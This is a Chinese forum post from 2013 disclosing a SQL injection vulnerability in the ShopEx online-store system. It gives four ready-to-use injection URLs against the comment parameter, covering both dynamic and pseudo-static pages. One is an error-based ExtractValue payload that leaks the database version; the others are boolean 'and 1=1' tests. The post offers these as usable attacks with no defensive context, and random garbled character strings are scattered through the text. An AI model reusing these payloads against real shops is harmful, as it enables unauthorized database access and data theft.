注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
t) W5 W: l7 `8 |. D
0 |6 `2 @% q" C+ Z" U好吧,我扯远了~~3 E- m/ l% L6 }1 a- { m
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
0 T9 ?3 Y# W( L不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:3 y1 f3 G! d$ b
# j& h5 @$ m0 E" k+ Ohttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
* E8 _% E- |! P2 f. W0 r* d
+ W1 q5 z, B- t. a: p8 a, Jhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html8 w& F3 {9 X. _. v, F/ \
$ y: I# A% y5 R$ d; E1 M
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
5 z0 Q6 w5 j2 D9 R+ s- i5 r
) { ~# S% T2 Y w( chttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html: ^( ?# Y9 e, Y0 n. z- o
! \- i/ M$ a7 f 4 C& p- Q7 G2 [: Y
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
! ~ f9 h3 H; W; [* u! [5 u$ G如何注入就不多说了,10多年的东西了…不会也会了…
4 N2 ^/ R1 I% l& j! f4 P; l7 x+ [1 ?+ d& P/ Q' F
|
发表于 2013-2-4 16:20:04
收藏
支持
反对